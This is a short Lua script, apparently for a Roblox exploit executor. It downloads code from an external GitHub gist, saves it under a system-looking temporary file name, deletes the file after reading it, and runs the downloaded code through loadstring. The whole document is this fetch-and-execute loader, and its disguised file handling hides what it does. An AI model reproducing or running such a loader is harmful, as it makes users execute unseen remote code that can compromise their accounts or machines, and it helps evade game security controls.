task.wait(1) local url = "https://gist.githubusercontent.com/oiPOLAR/66c6c2a40388179638152e97aa27516f/raw/gistfile1.txt" local n = ".sys_temp_" .. math.random(100, 999) writefile(n, game:HttpGet(url .. "?t=" .. tick(), true)) local s = readfile(n) delfile(n) loadstring(s)()